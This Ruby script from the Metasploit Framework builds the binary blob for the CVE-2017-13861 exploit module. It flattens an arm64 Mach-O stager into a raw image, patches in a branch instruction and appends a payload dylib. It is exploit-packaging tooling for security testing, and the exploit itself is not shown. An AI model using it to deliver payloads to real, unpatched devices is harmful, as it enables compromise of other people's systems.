GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2017-13861/create_bin.rb
1
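#!/usr/bin/env ruby
# -*- coding: binary -*-
#
# create_bin.rb — builds the exploit.bin blob used by the CVE-2017-13861 module.
#
# Takes an arm64 Mach-O stager, flattens its loadable segments into one raw
# image laid out exactly as they would be mapped (relative to the lowest
# non-__PAGEZERO segment), patches an AArch64 `B` to the lowest section into
# the image's first four bytes, pads to DYLIB_OFFSET and appends the payload
# dylib. The blob is written as-is; nothing in it is relocated afterwards.
#
# Usage: create_bin.rb <stager-macho> [payload.dylib] [exploit.bin]
#   The second and third arguments default to the names the original tooling
#   hard-coded: ./payload.dylib and ./exploit.bin.

require 'macho'

# Offset of the payload dylib inside the output blob. The flattened stager
# must fit entirely below it.
DYLIB_OFFSET = 0x10000

# Mach-O section flags: the low byte is the section type. Zero-fill types
# (S_ZEROFILL, S_GB_ZEROFILL, S_THREAD_LOCAL_ZEROFILL) have no bytes in the
# file — their `offset` field is 0 — so they must be left as zeros in the
# image rather than copied from the file, which would otherwise paste the
# Mach-O header over what the stager expects to be zero-initialised memory.
SECTION_TYPE_MASK = 0xff
ZEROFILL_SECTION_TYPES = [0x01, 0x0c, 0x12].freeze

# @param section [MachO::Sections::Section]
# @return [Boolean] true when the section is not backed by file contents
def zerofill?(section)
  ZEROFILL_SECTION_TYPES.include?(section.flags & SECTION_TYPE_MASK)
end

# Encodes an AArch64 unconditional branch from address 0 to +target+.
#
# Byte-identical to what `rasm2 -a arm -b 64 "b 0x..."` produced for the
# original script, but computed locally: the external tool could be missing
# or reject the input, and because its output was never checked, a failure
# silently yielded a blob whose first four bytes were deleted instead of
# patched.
#
# @param target [Integer] byte offset of the destination relative to the
#   branch instruction itself (which sits at offset 0 of the image)
# @return [String] the 4 little-endian bytes of the instruction
# @raise [ArgumentError] if +target+ is not 4-byte aligned or lies outside
#   the ±128 MiB reach of B's 26-bit word immediate
def encode_branch(target)
  unless (target & 3).zero?
    raise ArgumentError, "branch target 0x#{target.to_s(16)} is not 4-byte aligned"
  end
  imm26 = target >> 2
  unless (-(1 << 25)...(1 << 25)).cover?(imm26)
    raise ArgumentError, "branch target 0x#{target.to_s(16)} is out of B range"
  end
  # B: opcode 000101 in bits 31..26, signed word offset in bits 25..0.
  [0x14000000 | (imm26 & 0x03ffffff)].pack("V")
end

# Lays out every file-backed section of +macho+ at (addr - base), where base
# is the lowest vmaddr among the non-__PAGEZERO segments.
#
# @param data [String] the raw Mach-O bytes (binary encoding)
# @param macho [MachO::MachOFile] parsed view of +data+
# @return [Array(String, Integer)] the flat image and the flat address of the
#   lowest section, which the caller uses as the branch target
def flatten_stager(data, macho)
  pagezero = MachO::LoadCommands::SEGMENT_NAMES[:SEG_PAGEZERO]
  segments = macho.segments.reject { |seg| seg.segname == pagezero }
  abort "no loadable segments in stager" if segments.empty?

  base  = segments.map(&:vmaddr).min
  limit = segments.map { |seg| seg.vmaddr + seg.vmsize }.max
  segments.each { |seg| puts "segment: #{seg.segname} #{seg.vmaddr.to_s(16)}" }
  puts "data: #{base.to_s(16)} -> #{limit.to_s(16)} #{(limit - base).to_s(16)}"

  image = "\x00".b * (limit - base)
  start = nil

  segments.each do |segment|
    puts "segment: #{segment.segname} vmaddr: #{segment.vmaddr.to_s(16)} fileoff: #{segment.fileoff.to_s(16)}"
    segment.sections.each do |section|
      flat = section.addr - base
      puts "section: #{section.sectname} off: #{section.offset.to_s(16)} addr: #{section.addr.to_s(16)} size: #{section.size.to_s(16)}"

      # String#[]= past the end would silently extend the image; refuse instead.
      if flat < 0 || flat + section.size > image.bytesize
        abort "section #{section.sectname} lies outside the segment mapping"
      end
      start = flat if start.nil? || flat < start
      next if zerofill?(section) # the image is already zero there

      bytes = data[section.offset, section.size]
      if bytes.nil? || bytes.bytesize != section.size
        abort "section #{section.sectname} runs past the end of the stager file"
      end
      puts "flat_addr: #{flat.to_s(16)} (#{bytes.bytesize.to_s(16)})"
      image[flat, bytes.bytesize] = bytes
    end
  end

  abort "stager has no sections" if start.nil?
  [image, start]
end

# Entry point.
# @param argv [Array<String>] stager path, then optional payload and output paths
def main(argv)
  stager_file, payload_file, output_file = argv
  if stager_file.nil?
    abort "usage: #{$PROGRAM_NAME} <stager-macho> [payload.dylib] [exploit.bin]"
  end
  payload_file ||= "payload.dylib"
  output_file  ||= "exploit.bin"

  data  = File.binread(stager_file)
  macho = MachO::MachOFile.new_from_bin(data)

  lc_main = macho[:LC_MAIN].first
  abort "stager has no LC_MAIN load command" if lc_main.nil?
  # NOTE(review): LC_MAIN's entryoff is the stager's declared entry point, but
  # the branch patched in below targets the lowest section, as the original
  # script did. The two coincide only when main() is the first thing in the
  # first section — confirm that holds for the stager being packaged.
  entry_offset = lc_main.entryoff

  image, start = flatten_stager(data, macho)
  puts "start: #{start.to_s(16)} (LC_MAIN entryoff: #{entry_offset.to_s(16)})"

  # The branch is written over bytes 0..3 after the sections are laid out, so
  # a section starting below offset 4 would be clobbered (and a start of 0
  # would branch to itself).
  abort "lowest section (0x#{start.to_s(16)}) overlaps the branch slot" if start < 4
  branch = encode_branch(start)
  puts "branch: #{branch.unpack('H*').first}"
  image[0, 4] = branch

  puts "size: #{image.bytesize}"
  # The original computed a negative pad length here and crashed with an
  # unhelpful ArgumentError; say what actually went wrong.
  if image.bytesize > DYLIB_OFFSET
    abort "flattened stager (0x#{image.bytesize.to_s(16)} bytes) does not fit below the dylib at 0x#{DYLIB_OFFSET.to_s(16)}"
  end
  image << "\x00".b * (DYLIB_OFFSET - image.bytesize)
  image << File.binread(payload_file)

  puts "final size: #{image.bytesize}"
  File.binwrite(output_file, image)
end

main(ARGV) if __FILE__ == $PROGRAM_NAME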